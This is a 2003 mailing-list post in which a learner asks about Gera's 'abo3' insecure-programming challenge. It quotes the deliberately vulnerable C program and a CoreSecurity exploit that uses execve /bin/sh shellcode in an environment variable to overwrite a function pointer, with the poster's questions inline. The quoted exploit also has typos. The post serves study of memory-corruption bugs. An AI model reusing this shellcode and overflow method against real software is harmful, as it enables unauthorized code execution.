Abo3 (can someone help me?)

From: Discussion Lists <discussions(at)lagraphico.com>
Date: Sun May 25 2003 - 00:11:20 EDT

Hi all,
This list has become far more interesting with the challenges. Thanks to all for the participation. Recently, a user posted a particular site:

http://community.core-sdi.com/~gera/InsecureProgramming/abo3.html

Which has the following code:

/* abo3.c *

• specially crafted to feed your brain by gera@core-sdi.com */

/* This'll prepare you for The Next Step */

int main(int argv,char **argc) {

	extern system,puts; 
	void (*fn)(char*)=(void(*)(char*))&system;
	char buf[256];

	fn=(void(*)(char*))&puts;
	strcpy(buf,argc[1]);
	fn(argc[2]);
	exit(1);

}

The issue here is that there is an exit(1) at the end of the code. So even if you were to overwrite the return address, it would not matter because there is no return (if I understand correctly).

The solution, according to this place:

http://www.core-sec.com/examples/core_vulnerabilities.pdf

is that we have to stick our shellcode in an environment variable, then overwrite the address of that variable into the address of the fn() function. So they lay out the following code to do it (questions in-line):

/*
** exp3.c
** Coded by CoreSecurity - info@core-sec.com
**/

#include <string.h>
#include <uninstd.h>

#define BUFSIZE 261

/* Why 261? THe vulnerable program allocates 256 I thought. Where is
that other 5 going to/for? */

/* 24 bytes shellcode */

char shellcode[]=

        /*  1       P    h  \   \   s   h    h  \   b    i  */
	"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
	/* n           P  2                */
	"\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

/* so it is pushing /bin/sh backwards on the stack. Aleph1 talks about
how to create this code so I won't ask about it*/ int main(void) {

	char *env[3] = {shellcode, NULL};
	char evil_buffer[BUFFSIZE];
	char *p;

	/*Calculating address of shellcode */
	int ret = 0xbffffffa - strlen(shellcode) -

strlen("/home/user/gera/abo3");
/* That is what I don't get. First, what is the 0xbffffffa address? Is
that where supposedly the
ending address of the code when everything is pushed onto the stack? I believe strlen calculates the
length of a string? If that is the case, why do they need to calculate shellcode, and the path. I
also assume the path is case specific. In other words, if the binary has a different path on my system,
I would use that instead. */

	/* constructing the buffer */
	p = evil_buffer;
	memset(p, 'B', 256);	// Some junk
	p += 256;

	*((void **)p) = (void *) (ret);
	p += 4;
	*p = '\0';

	/* Two arguments are passed to the vulnerable program */
	execle("/home/user/gera/abo3", "abo3", evil_buffer, "A",

NULL,env);

---

I don't completely understand much of that last part either, but I have the K&R book, so I will drag it out and see what I can find out. Received on Sun May 25 23:34:50 2003